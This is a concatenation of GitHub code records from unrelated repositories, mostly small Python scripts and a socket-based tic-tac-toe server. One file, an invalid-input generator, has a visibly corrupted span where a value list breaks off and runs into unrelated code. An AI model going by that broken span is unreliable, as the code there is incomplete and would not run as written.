Xlnet():\n def __init__(self, config):\n model_path = config['model_path']\n\n self.tokenizer = XLNetTokenizer.from_pretrained(model_path)\n 
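`XLNetForMultipleChoice` in this record scores each candidate sequence, so its inputs carry an extra choices dimension of shape (batch, num_choices, seq_len). A minimal shape sketch, assuming the public `xlnet-base-cased` checkpoint and a reasonably recent `transformers` release; the record loads a local `model_path` instead:

    import torch
    from transformers import XLNetTokenizer, XLNetForMultipleChoice

    tok = XLNetTokenizer.from_pretrained("xlnet-base-cased")
    model = XLNetForMultipleChoice.from_pretrained("xlnet-base-cased")

    choices = ["The sky is blue.", "The sky is green."]
    # Pad to a common length so the stacked tensor is rectangular; the
    # list-of-encode() call in predict() below fails when lengths differ.
    enc = tok(choices, return_tensors="pt", padding=True)
    input_ids = enc["input_ids"].unsqueeze(0)            # (batch=1, num_choices, seq_len)
    attention_mask = enc["attention_mask"].unsqueeze(0)
    with torch.no_grad():
        out = model(input_ids=input_ids, attention_mask=attention_mask)
    scores = out.logits if hasattr(out, "logits") else out[0]  # one score per choice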
self.model = XLNetForMultipleChoice.from_pretrained(model_path)\n\n    def predict(self, choices):\n        input_ids = torch.tensor([self.tokenizer.encode(s) for s in choices]).unsqueeze(0)  # Batch size 1, one row per choice\n        labels = torch.tensor(3).unsqueeze(0)  # Batch size 1\n\n        outputs = self.model(input_ids, labels=labels)\n        loss, classification_scores = outputs[:2]\n\n        return classification_scores","repo_name":"vivemeno/ARC_NLP_Enhancement","sub_path":"xlnet.py","file_name":"xlnet.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9691504861","text":"from sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\n\n\nflask_backend_Base = declarative_base()\nhacker_news_Base = declarative_base()\n\n\ndef create_session(db_uri):\n    engine = create_engine(\n        db_uri\n    )\n    session = scoped_session(\n        sessionmaker(\n            autocommit=False,\n            autoflush=False,\n            bind=engine,\n        )\n    )\n    return session\n","repo_name":"BorodaUA/flask_backend","sub_path":"db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73620518069","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jan 13 22:01:10 2022\r\n\r\n@author: ryanz\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n# df1 = pd.read_csv(\"C:/Users/ryanz/Desktop/real_result_yes3.csv\")\r\n\r\n# addlist = df1['distance'].unique()\r\n# dsf = []\r\n# for m in addlist:\r\n#     df_ch = df1[df1['distance'] == m]\r\n#     if len(df_ch) >= 2:\r\n#         dsf.append(df_ch)\r\n\r\n# result_yes = pd.concat(dsf)\r\n# result_yes.to_csv(\"C:/Users/ryanz/Desktop/3.csv\")\r\n# ###########################################################################################\r\n# data1 = pd.read_csv(\"C:/Users/ryanz/Desktop/real_result_yes3.csv\")\r\n# data2 = pd.read_csv(\"C:/Users/ryanz/Desktop/3.csv\")\r\n# df_mat = data1.merge(data2,left_on='FIDALCO',right_on = 'SAMEDIS', how= 'left')\r\n# df_mat.to_csv(\"C:/Users/ryanz/Desktop/real_result_yes4.csv\")\r\n###########################################################################################\r\nsure1 = pd.read_csv(\"C:/Users/ryanz/Desktop/real_result_yes9.csv\")\r\nsurelist = sure1['distance'].unique()\r\n# dsfs = []\r\nfor m in surelist:\r\n    df_sure = sure1[sure1['distance'] == m]\r\n    df_sure.reset_index(drop = True, inplace = True)\r\n    if len(df_sure) >= 2:\r\n        if pd.isna(df_sure['lis'][0]) == False:\r\n            for x in range(len(df_sure)):\r\n                index = sure1[sure1.FIDALCO == df_sure['FIDALCO'][x]].index.tolist()[0]\r\n                sure1.loc[index, \"lis\"] = sure1.loc[index, 'FIDALCO']\r\nsure1.to_csv(\"C:/Users/ryanz/Desktop/real_result_yes10.csv\")\r\n\r\n# match safegraph data\r\ndf1 = pd.read_csv(\"C:/Users/ryanz/Desktop/2022-01-07-21-core_poi4.csv\")\r\ndf2 = pd.read_csv(\"C:/Users/ryanz/Desktop/yes3.csv\") \r\ndf_mat = df1.merge(df2,left_on='FIDSAFE',right_on = 'FIDSAFE', how= 'left')\r\ndf_mat.to_csv(\"C:/Users/ryanz/Desktop/2022-01-07-21-core_poi5.csv\")\r\n\r\n# match alcohol data\r\ndf1 = pd.read_csv(\"C:/Users/ryanz/Desktop/NY alcohol_0107_all_5_yesco.csv\")\r\ndf2 = pd.read_csv(\"C:/Users/ryanz/Desktop/no3.csv\") \r\ndf_mat = df1.merge(df2,left_on='FIDALCO',right_on = 'FIDALCO', how= 'left')\r\ndf_mat.to_csv(\"C:/Users/ryanz/Desktop/NY 
alcohol_0107_all_11_yesco.csv\")","repo_name":"ryan-zhenqi-zhou/Data-Quality-Assessment","sub_path":"Code/0205 Find same distance.py","file_name":"0205 Find same distance.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"27187889021","text":"\"\"\"Utils to get column-level lineage graph of SQL query; WIP.\"\"\"\nimport json\nimport random\nfrom hashlib import md5\nfrom typing import Dict, List, Optional, Tuple, Union\n\nimport networkx as nx\n\nfrom matplotlib import pyplot as plt\n\n\ndef find_col(\n query: Dict, col_name: str\n) -> Optional[Tuple[Dict, Union[str, List[Union[str, Dict]]]]]:\n \"\"\"Get matching colum from query\n\n Arguments:\n query: moz-sql-parser query with 'select' key and 'from' key\n col_name: col we want to get lineage info from\n\n Returns:\n lineage info of column.\n \"\"\"\n final_select = query[\"select\"]\n if type(final_select) == list:\n matching_cols = [\n col for col in query[\"select\"] if col.get(\"name\", col[\"value\"]) == col_name\n ]\n if len(matching_cols):\n return (matching_cols[0], query[\"from\"])\n elif type(final_select) == dict:\n # handle '*'\n if \"*\" in str(final_select):\n return ({\"value\": col_name}, query[\"from\"])\n return None\n\n\ndef slice_ctes(query: Dict, cte_name: str):\n return {w[\"name\"]: w[\"value\"] for w in query[\"with\"]}.get(cte_name)\n\n\nclass LineagePoint:\n def __init__(self, x, y, display_name=None):\n self.x: Dict = x\n self.y: Union[str, Dict, List[Union[str, Dict]]] = y\n self.display_name = display_name\n\n @property\n def col_name(self):\n # if there is a rename, get the renamed value\n return self.x.get(\"name\", self.x[\"value\"])\n\n @property\n def ancestor_col_name(self):\n if type(self.x[\"value\"]) == str:\n # not an aggregate\n # print('~'*31)\n # print(self.x[\"value\"])\n # print('~'*31)\n return self.x[\"value\"]\n else:\n # print('/'*31)\n # print(self.x['value'].values())\n token = next(iter(self.x[\"value\"].values()))\n # if there is an aggregation, get the ancestor column\n # the key could be anything\n # TODO: handle complex aggregations, e.g. 
for idf_entities.idf\n # if isinstance(token, list):\n # tokens = flatten(token)\n # tok = {md5(json.dumps(k).encode(\"utf-8\")).hexdigest(): v for k,v in tokens.items()}\n # # print('tokens')\n # # print(tokens,tok)\n # return next(iter(tok.values()))\n # print('\\\\'*31)\n return token\n\n @staticmethod\n def get_table_name(tbl):\n if type(tbl) == list:\n # more than 1 table\n return md5(json.dumps(tbl).encode(\"utf-8\")).hexdigest()\n elif type(tbl) == str:\n return tbl\n elif type(tbl) == dict:\n # TODO: check when JOIN + rename\n # TODO: check for left, inner and right JOIN\n return tbl.get(\"join\") or tbl.get(\"value\")\n\n @property\n def table_name(self):\n return self.display_name or self.get_table_name(self.y)\n\n def __repr__(self):\n # Important: ancestor_col_name instead of col_name because col_name might be a rename\n return f\"{self.table_name}.{self.ancestor_col_name}\"\n\nfrom functools import reduce\n\n\ndef _reducer(items, key, val, pref):\n if isinstance(val, dict):\n return {**items, **flatten(val, pref = f'{pref}{key}')}\n elif isinstance(val, list): \n return {**items, **flatten(dict(enumerate(val)), pref = f'{pref}{key}')}\n elif isinstance(val, str): \n return {**items, f'{pref}{key}': val}\n else:\n return {**items}\n\n\ndef flatten(d, pref=''):\n if isinstance(d, list):\n d = dict(enumerate(d))\n return(\n reduce(\n lambda new_d, kv: _reducer(new_d, *kv, pref), \n d.items(), \n {}\n )\n )\n\n\ndef process_lineage_point(lp: LineagePoint, query: Dict) -> Optional[List[LineagePoint]]:\n # Handle cases where the column is computed with custom logic\n if type(lp.ancestor_col_name) != str:\n print('AQUIII!')\n #return None\n cols = flatten(lp.ancestor_col_name).values()\n new_lp = [ LineagePoint(*({'value': col}, query['from'])) for col in cols]\n return new_lp\n \n\n if type(lp.y) == list:\n # flatten joins by considering each part of join as potential provenance for column\n new_lps = [LineagePoint(lp.x, tbl) for tbl in lp.y]\n return new_lps\n else:\n # TODO: use name_for_upstream instead of name_for_downstream, e.g. 
for kg_coaches.coach_id\n q = slice_ctes(query, lp.table_name)\n if not q:\n # no CTE with the table_name was found\n return []\n found_col = find_col(query=q, col_name=lp.ancestor_col_name)\n if not found_col:\n #  CTE isn't related to column\n # remove dead branch\n return None\n new_lp = LineagePoint(*found_col)\n return [new_lp]\n\n\ndef draw_multi_graph(G: nx.Graph):\n return nx.drawing.nx_pydot.to_pydot(G)\n\n\n\ndef draw_graph(G: nx.Graph) -> plt.Figure:\n fig, ax = plt.subplots(figsize=(15, 7))\n \n\n if len(G):\n pos = nx.spring_layout(G)\n \n # nodes\n nx.draw_networkx_nodes(G, pos,\n node_size=100,\n node_color=\"orange\")\n\n #edges \n nx.draw_networkx_edges(\n G, pos,\n width=1,alpha=0.9,edge_color='black',\n arrowsize=20,\n ax=ax)\n #edge-labels\n formatted_edge_labels = {(u, v): d for u, v, d in G.edges(data=True)}\n nx.draw_networkx_edge_labels(G,pos,edge_labels=formatted_edge_labels,font_color='red')\n\n # labels\n nodenames = {n:'\\n'.join(n.split('.')) for n in G.nodes()}\n\n nx.draw_networkx_labels(\n G,pos,font_size=8,font_family='sans-serif'\n ,verticalalignment='bottom'\n ,labels=nodenames\n )\n plt.axis('off')\n plt.tight_layout()\n plt.subplots_adjust(left=0.1)\n\n return fig\n","repo_name":"dennysreg/sql-lineage","sub_path":"src/dbt_metadata_utils/column_level.py","file_name":"column_level.py","file_ext":"py","file_size_in_byte":5976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26245342607","text":"def work_fn():\n print('working')\n\n # for i in range(100):\n # print('this is running', i)\n # sleep(0.5)\n # sys.stdout.flush()\n\n\nif __name__ == '__main__':\n import jaynes\n\n # from dmc_gen.train import train\n for i in range(60):\n jaynes.config(\"vision\", launch=dict(ip=f\"visiongpu{i:02d}\"))\n jaynes.run(work_fn)\n\n # for i in range(1):\n # jaynes.config(\"vision-gpu\")\n # jaynes.run(work_fn)\n\n # for i in range(60):\n # jaynes.config(\"visiongpu\", launch=dict(ip=f\"visiongpu{i:02d}\"),\n # runner=dict(pypath=\"$HOME/jaynes-debug\", work_dir=\"$HOME/jaynes-debug\"), mounts=[], )\n # jaynes.run(work_fn, aug_data_prefix=\"/afs/csail.mit.edu/u/g/geyang/mit/dmc_gen/custom_vendor/data\")\n\n # jaynes.config(\"supercloud\", runner=dict(n_cpu=1, n_gpu=0))\n # jaynes.run(train_fn)\n jaynes.listen()\n\n# highly non-rectangular\n# custom cuda kernels\n# how do fully general tensor product\n#\n# Does it make it harder to optimize. 
Higher order\n","repo_name":"geyang/dmc_gen","sub_path":"dmc_gen_analysis/__infra/map_on_cluster.py","file_name":"map_on_cluster.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9809216696","text":"# -*- coding: UTF-8 -*-\n'''\n Create by 谢昊璋 on 2021/4/26 22:03 \n'''\n# coding = utf-8\nimport os\n\n# 文件路径\n# path = \"D:/RM2021/test/\"\npath = \"D:/RM2021/1/\"\n\n# 标号起点\ncount = 1\n\n# 获取该目录下所有文件,存入列表中\nfileList = os.listdir(path)\n\nn = 0\nfor i in fileList:\n\n old_name = path + fileList[n]\n new_name= path + \"Img\" + str(count) + \".jpg\"\n\n print(i)\n\n os.rename(old_name, new_name) # 用os模块中的rename方法对文件改名\n print(i, '======>', new_name)\n n += 1\n count += 1\nprint(\"总共处理{}张图片\".format(n))","repo_name":"Pilipala-2022/Tool","sub_path":"Rename.py","file_name":"Rename.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31959319558","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport random\nimport re\nimport string\nfrom .datagenerator import DataGenerator\n\nclass InvalidDataGenerator:\n\n invalid_boolean_values = [\"TRUE\", \"FALSE\", \"true \", \"false \", 0, 1]\n invalid_integer_values = [\"1.0\", \"0.0\", \"-0.9999999999999\", \"0.9999999999999\", \n \"1 \", \" 34\", \"45 67\", \" 65 9 \", \"45 str\", \"45str\",\n \"str 5\", \"str5\",\n ]\n invalid_number_values = [\"1.23 \", \" 123.45\", \" 123.45 \", \"123str.45\"]\n invalid_non_string_values = [\" \", \"'\", \"&&\", \"||\", \"☃\",\">\",\" 0:\n local_schema = dict(schema)\n local_schema[\"minLength\"] = local_schema[\"maxLength\"] = schema[\"minLength\"]-1\n invalids.append(self.data_generator.random_string(local_schema))\n\n if \"pattern\" in schema:\n pattern = schema[\"pattern\"]\n\n r_pattern = re.compile(pattern)\n \n if not r_pattern.match(\"\"):\n invalids.append(\"\")\n\n found=0\n for i in range(100):\n length = random.randint(0,100)\n gen = ''.join(random.choice(string.printable) for x in range(length))\n\n print(gen)\n if gen not in invalids and not r_pattern.match(gen):\n\n invalids.append(gen)\n found += 1\n if found == self.invalid_strings:\n break\n return invalids\n\n \n\nif __name__ == \"__main__\":\n generator = InvalidDataGenerator()\n print(generator.invalid_number())\n print(generator.invalid_string({\"pattern\":\"^[a-zA-Z]*$\"}))\n\n","repo_name":"hamstah/apitools","sub_path":"apitools/invaliddatagenerator.py","file_name":"invaliddatagenerator.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"43622672671","text":"\nimport supervisor\nimport time\nimport board\nimport touchio\n\ntouch1 = touchio.TouchIn(board.TOUCH1)\ntouch2 = touchio.TouchIn(board.TOUCH2)\n\nname_is_main = __name__ == '__main__'\n\nwhile name_is_main:\n print('Running code.py')\n print('TOUCH1 for spacebar')\n print('TOUCH2 for midi')\n time.sleep(5)\n if touch1.value or touch2.value:\n supervisor.set_next_code_file('spacebar.py' if touch1.value else 'midi.py')\n supervisor.reload()\n","repo_name":"pcurry/trinkey-trickery","sub_path":"adafruit-proximity-trinkey/CircuitPython/Dual-Load/Spacebar-MIDI/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39413990128","text":"import json\n\nif 
__name__ == '__main__':\n # read the file normally\n with open('airlines.csv', 'r') as f:\n # header of the csv\n header = f.readline().rstrip().split(',')\n # print(header)\n out1_dict = dict() # Output Dictionary\n for line in f.readlines(): # loop over all the lines\n data = line.rstrip().split(',') # line split by comma saved into list\n name = ','.join(data[1:3])[1:-1] # getting airport name\n out1_dict[name] = 1 + out1_dict.get(name, 0) # filling up dictionary as hashmap\n\n # OUTPUT 1\n output_1 = json.dumps(out1_dict, indent=4) # creating json object\n print('OUTPUT 1: Unique Airport Names & their Counts')\n print(output_1, '\\n')\n\n # OUTPUT 2\n max_cnt_name = max(out1_dict, key=out1_dict.get)\n max_cnt = out1_dict[max_cnt_name]\n print('OUTPUT 3: Airport mentioned most number of times')\n print(f'Name: {max_cnt_name}\\nCount: {max_cnt}\\n')\n\n # OUTPUT 3\n min_cnt_name = min(out1_dict, key=out1_dict.get)\n min_cnt = out1_dict[min_cnt_name]\n print('OUTPUT 2: Airport mentioned least number of times')\n print(f'Name: {min_cnt_name}\\nCount: {min_cnt}\\n')\n","repo_name":"sarthakgupta63/Fyers_Hackathon_Skilleza","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"40500029261","text":"# CCC J2 - 2005 RSA Numbers\n# Park\n# U3 While Loop Review Solution\n\n# IPO\nlower = int(input())\nupper = int(input())\n\nlower_copy = lower\nrsa_counter = 0\n\nwhile lower <= upper:\n factor_counter = 0\n divider = 1\n\n # factor counter\n while divider <= lower:\n if lower % divider == 0:\n factor_counter += 1\n\n divider += 1\n # end of inner while loop\n\n if factor_counter == 4:\n rsa_counter += 1\n\n lower += 1\n# end of while\n\nprint('The number of RSA numbers between', lower_copy, 'and', upper, 'is', rsa_counter)\n","repo_name":"mrparkonline/python3_while","sub_path":"review/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42852326603","text":"import socket\nfrom _thread import start_new_thread\nimport numpy as np\nfrom game import Game\n\n#server = \"93.175.0.37\"\n#server = \"127.0.0.1\"\nserver = \"192.168.0.12\"\nport = 7777\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n s.bind((server, port))\nexcept socket.error as e:\n print(str(e))\n\ns.listen()\nprint(f\"Server started at {server}:{port}, awaiting connection...\")\n\ndef n2xy(n):\n return n%3, n//3\n\npiece = {0:' ', 1: 'X', 2: 'O'}\n\nclass Player():\n\n def __init__(self, id, conn, addr):\n self.id = id\n self.conn = conn\n self.addr = addr\n self.game = None\n self.turn = 0\n self.ready = True\n\n def address(self):\n return ':'.join(str(a) for a in self.addr)\n\ndef send(conn, *args):\n conn.sendall(bytes(args))\n print(\"Sent\", args, \"to\", conn.getpeername())\n\ndef threaded_client(player):\n conn = player.conn\n playing = [other.id for other in players]\n send(conn, player.id, len(playing), *playing)\n reply = \"\"\n while True:\n try:\n data = conn.recv(2048)\n if not data:\n break\n print(f\"{player.address()}: received {data}\")\n action = int(data[0])\n if action == 0: # connect to game\n print(f\"{player.address()}: Attempting to connect to game\")\n if player.game:\n print(f\"{player.address()}: Failed to connect, already connected to a game\")\n send(conn, 0, 4)\n continue\n for game in active_games:\n if 
game.awaiting:\n if game.player_1 > -1:\n player.game = game\n player.turn = 2\n game.player_2 = player.id\n game.awaiting = False\n game.game_over = False\n print(f\"{player.address()}: Connected to game {game.id} as O, game started\")\n send(conn, 1, game.id % 256, player.turn, game.player_1 % 256)\n for other_player in players:\n if other_player.id == game.player_1:\n send(other_player.conn, 5, player.id)\n elif game.player_2 > -1:\n player.game = game\n player.turn = 1\n game.player_1 = player.id\n game.awaiting = False\n game.game_over = False\n print(f\"{player.address()}: Connected to game {game.id} as X, game started\")\n send(conn, 1, game.id % 256, player.turn, game.player_2 % 256)\n for other_player in players:\n if other_player.id == game.player_2:\n send(other_player.conn, 5, player.id % 256)\n else:\n player.game = game\n game.player_1 = player.id\n player.turn = 1\n print(f\"{player.address()}: Connected to game {game.id} as X, awaiting second player...\")\n playing = [other.id for other in players]\n send(conn, 2, game.id % 256, player.turn, min(len(playing), 255), *playing[-255:])\n if not player.game:\n game = Game(ids[\"game_id\"], player.id)\n ids[\"game_id\"] += 1\n active_games.append(game)\n player.game = game\n player.turn = 1\n print(f\"{player.address()}: Started game {game.id} as X, awaiting second player...\")\n playing = [other.id for other in players]\n send(conn, 2, game.id % 256, player.turn, min(len(playing), 255), *playing[-255:])\n elif action == 1: # play f*c\n field = data[1]\n cell = data[2]\n game = player.game\n if not player.game:\n print(f\"{player.address()}: Failed to play, not connected to a game\")\n send(conn, 0, 0)\n continue\n print(f\"{player.address()}: Attempting to play in game {game.id}: {field}x{cell}\")\n if game.over():\n print(f\"{player.address()}: Failed to play, game {game.id} is over / has not started yet\")\n send(conn, 0, 1)\n continue\n if game.turn != player.turn:\n print(f\"{player.address()}: Failed to play in game {game.id}: turn is {piece[game.turn]}, player is {piece[player.turn]}\")\n send(conn, 0, 2)\n continue\n valid = game.play(field, cell)\n if not valid:\n print(f\"{player.address()}: Failed to play in game {game.id}: invalid cell or field num\")\n send(conn, 0, 3)\n continue\n print(f\"Server: game {game.id}:\\n{game}\")\n send(conn, 3, *game.field.flatten(), *game.main_field, game.active_field % 256)\n if game.over():\n print(f\"Game over, {piece[game.winner]+' won' if game.winner else 'draw'}\")\n send(conn, 4, game.winner)\n player.ready = False\n other = game.player_1\n if player.turn == 1:\n other = game.player_2\n for other_player in players:\n if other_player.id == other:\n send(other_player.conn, 3, *game.field.flatten(), *game.main_field, game.active_field % 256)\n if game.over():\n send(other_player.conn, 4, game.winner)\n other_player.ready = False\n elif action == 2: # request restart game\n if not player.game:\n print(f\"{player.address()}: Failed to restart, not connected to a game\")\n send(conn, 0, 0)\n continue\n if game.awaiting:\n print(f\"{player.address()}: Failed to restart, other player had disconnected\")\n send(conn, 0, 5)\n continue\n player.ready = True\n other_ready = False\n other = game.player_1\n if player.turn == 1:\n other = game.player_2\n for other_player in players:\n if other_player.id == other:\n if other_player.ready:\n other_ready = True\n game.player_1, game.player_2 = game.player_2, game.player_1\n player.turn, other_player.turn = other_player.turn, player.turn\n 
game.reset()\n game.awaiting = False\n game.game_over = False\n send(conn, 1, game.id % 256, player.turn, other % 256)\n send(other_player.conn, 1, game.id % 256, other_player.turn, player.id % 256)\n else:\n send(other_player.conn, 7)\n if not other_ready:\n send(conn, 7)\n elif action == 3: # bail game\n if not player.game:\n print(f\"{player.address()}: Failed to leave, not connected to a game\")\n send(conn, 0, 0)\n continue\n game = player.game\n print(f\"{player.address()}: Left the game {game.id}\")\n playing = [other.id for other in players]\n send(conn, 2, 255, 0, min(len(playing), 255), *playing[-255:])\n if player.turn == 1:\n game.player_1 = -1\n if game.player_2 == -1:\n print(f\"Server: Closed empty game {game.id}\")\n active_games.remove(game)\n else:\n game.reset()\n game.awaiting = True\n for other_player in players:\n if other_player.id == game.player_2:\n send(other_player.conn, 2, game.id % 256, 2, min(len(playing), 255), *playing[-255:])\n elif player.turn == 2:\n game.player_2 = -1\n if game.player_1 == -1:\n print(f\"Server: Closed empty game {game.id}\")\n active_games.remove(game)\n else:\n game.reset()\n game.awaiting = True\n for other_player in players:\n if other_player.id == game.player_1:\n send(other_player.conn, 2, game.id % 256, 1, min(len(playing), 255), *playing[-255:])\n player.turn = 0\n player.game = None\n elif action == 4: # message to opponent\n game = player.game\n if not game:\n print(f\"{player.address()}: Failed to send, not connected to a game\")\n send(conn, 0, 0)\n continue\n other = game.player_2\n if player.turn == 2:\n other = game.player_1\n if other == -1:\n print(f\"{player.address()}: Failed to send, other player has not connected yet\")\n send(conn, 0, 1)\n continue\n valid = False\n for other_player in players:\n if other_player.id == other:\n other_player.conn.sendall(bytes([6])+bytes([player.id % 256])+bytes([1])+data[1:])\n print(f\"{player.id} to {other}: {data[1:].decode()}\")\n send(conn, 255)\n valid = True\n if not valid:\n print(f\"{player.id} to {other}, which is nobody: {data[1:].decode()}\")\n elif action == 5: # message to everyone\n for other_player in players:\n other_player.conn.sendall(bytes([6])+bytes([player.id % 256])+bytes([0])+data[1:])\n print(f\"{player.id} to everyone: {data[1:].decode()}\")\n else:\n print(f\"{player.address()}: Invalid action {action}\")\n send(conn, 0, 255)\n continue\n except Exception as e:\n print(f\"Error with {player.address()}: {e}\")\n break\n\n if player.game:\n game = player.game\n if player.turn == 1:\n game.player_1 = -1\n game.reset()\n for other_player in players:\n if other_player.id == game.player_2:\n send(other_player.conn, 2, game.id % 256, 2)\n else:\n game.player_2 = -1\n game.reset()\n for other_player in players:\n if other_player.id == game.player_1:\n send(other_player.conn, 2, game.id % 256, 1)\n players.remove(player)\n print(f\"{player.address()}: Disconnected\")\n conn.close()\n\nids = {\n \"game_id\": 0,\n \"player_id\": 0\n}\nactive_games = []\nplayers = []\nwhile True:\n try:\n conn, addr = s.accept()\n player = Player(ids[\"player_id\"], conn, addr)\n ids[\"player_id\"] += 1\n players.append(player)\n print(\"Connected to:\", player.address())\n start_new_thread(threaded_client, (player,))\n except Exception as e:\n print(\"Error: \" + str(e) + \", exiting server...\")\n s.close()\n 
break\ninput()","repo_name":"vgurnik/Super-Tic-Tac-Toe","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31369631259","text":"import math\nimport random\nimport time\nimport tkinter\nfrom typing import List\n\nfrom NeuralNet import NeuralNet\n\n# Individual constants:\n# Bird neural net data:\nINPUTS = 2\nHIDDEN = [3]\nOUTPUTS = 1\n# Genetic algorithm constants:\nMUTATION_PROB = 0.2\nCROSSOVER_PROB = 0.5\nMUTATION_MOVE_RANGE = 2\nPOPULATION_SIZE = 50\nMAX_GENERATIONS = math.inf\nTOURNAMENT_SIZE = 10\nHALL_OF_FAME_SIZE = 5\n# Game constants:\nWINDOW_WIDTH = 900\nWINDOW_HEIGHT = 600\nFPS = 30\n# Bird constants:\nDEFAULT_X = 0\nDEFAULT_Y = WINDOW_HEIGHT / 2\nDEFAULT_SPEEDX = 400\nDEFAULT_SPEEDY = 0\nGRAVITY = 1600\nJUMP_FORCE = -600\nBIRD_WIDTH = 40\nBIRD_HEIGHT = 30\n# Walls constants:\nWALL_BETWEEN = 150\nWALL_WIDTH = 50\nWALL_MIN_Y = WALL_BETWEEN\nWALL_MAX_Y = WINDOW_HEIGHT - WALL_BETWEEN\n# Camera constant:\nCAMERA_DELTA_X = 100\n# Constant, how fast show evolution\n# ONLINE = True - birds learns online\n# ONLINE = False - birds learns with maximum speed\nONLINE = False\n\n\nclass Camera:\n x: float\n y: float = 0\n\n def sync(self, obj):\n self.x = obj.x - CAMERA_DELTA_X\n\n def get_x(self, x: float):\n return x - self.x\n\n def get_y(self, y: float):\n return y - self.y\n\n\nclass HitBox:\n def __init__(self, center_coord: tuple, size: tuple):\n self.centerX, self.centerY = center_coord\n self.width, self.height = size\n\n def draw(self, color: str):\n canvas.create_rectangle(camera.get_x(self.centerX - self.width / 2),\n camera.get_y(self.centerY - self.height / 2),\n camera.get_x(self.centerX + self.width / 2),\n camera.get_y(self.centerY + self.height / 2),\n outline=color, width=2)\n\n def hasPoint(self, point: tuple):\n return abs(self.centerX - point[0]) < self.width / 2 and \\\n abs(self.centerY - point[1]) < self.height / 2\n\n def hasStrike(self, other):\n return (\n self.hasPoint((other.centerX - other.width / 2, other.centerY - other.height / 2)) or\n self.hasPoint((other.centerX + other.width / 2, other.centerY - other.height / 2)) or\n self.hasPoint((other.centerX - other.width / 2, other.centerY + other.height / 2)) or\n self.hasPoint((other.centerX + other.width / 2, other.centerY + other.height / 2)) or\n other.hasPoint((self.centerX - self.width / 2, self.centerY - self.height / 2)) or\n other.hasPoint((self.centerX + self.width / 2, self.centerY - self.height / 2)) or\n other.hasPoint((self.centerX - self.width / 2, self.centerY + self.height / 2)) or\n other.hasPoint((self.centerX + self.width / 2, self.centerY + self.height / 2))\n )\n\n\nclass Wall:\n def __init__(self, x: float, y: float):\n self.x = x\n self.y = y\n self.width = WALL_WIDTH\n self.top_hit_box = HitBox((self.x, self.y - WALL_BETWEEN / 2 - WINDOW_HEIGHT / 2), (WALL_WIDTH, WINDOW_HEIGHT))\n self.bottom_hit_box = HitBox((self.x, self.y + WALL_BETWEEN / 2 + WINDOW_HEIGHT / 2), (WALL_WIDTH, WINDOW_HEIGHT))\n\n def __repr__(self):\n return f\"\"\n\n def draw(self):\n self.top_hit_box.draw('green')\n self.bottom_hit_box.draw('green')\n\n\nclass Bird:\n dead = False\n x = DEFAULT_X\n y = DEFAULT_Y\n speedX = DEFAULT_SPEEDX\n speedY = DEFAULT_SPEEDY\n width = BIRD_WIDTH\n height = BIRD_HEIGHT\n\n score: float = 0\n\n def __init__(self, genome = None):\n if genome is None:\n self.genome = NeuralNet(INPUTS, OUTPUTS, HIDDEN).json()['weights']\n else:\n 
self.genome = genome\n\n def mutate(self):\n for i in range(len(self.genome)):\n if random.random() < MUTATION_PROB:\n self.genome[i] += random.random() * 2 * MUTATION_MOVE_RANGE - MUTATION_MOVE_RANGE\n\n def crossover(self, other):\n for i in range(len(self.genome)):\n if random.random() < CROSSOVER_PROB:\n self.genome[i], other.genome[i] = other.genome[i], self.genome[i]\n\n @property\n def hit_box(self):\n return HitBox((self.x, self.y), (BIRD_WIDTH, BIRD_HEIGHT))\n\n @property\n def net(self):\n return NeuralNet.from_json({\n 'inputs': INPUTS,\n 'outputs': OUTPUTS,\n 'hidden': HIDDEN,\n 'weights': self.genome\n })\n\n def move(self, delta_time):\n self.speedY += GRAVITY * delta_time\n\n self.x += self.speedX * delta_time\n self.y += self.speedY * delta_time\n\n if self.y < 0 or self.y > WINDOW_HEIGHT:\n self.die()\n\n if not self.dead:\n self.score = self.x\n\n def jump(self, nearest_wall: Wall):\n distanceY = nearest_wall.y - self.y\n distanceX = nearest_wall.x + nearest_wall.width / 2 - self.x + self.width / 2\n distanceX /= WINDOW_WIDTH\n distanceY /= WINDOW_HEIGHT\n\n if self.net.push([distanceX, distanceY])[0] < 0.5:\n self.speedY = JUMP_FORCE\n\n def draw(self):\n self.hit_box.draw('red')\n\n def check_strike(self, wall: Wall):\n if self.hit_box.hasStrike(wall.top_hit_box) or self.hit_box.hasStrike(wall.bottom_hit_box):\n self.die()\n\n def die(self):\n if not self.dead:\n self.score = self.x\n self.dead = True\n\n def copy(self):\n return Bird(self.genome[:])\n\n\nclass Generation:\n walls: List[Wall] = []\n\n def 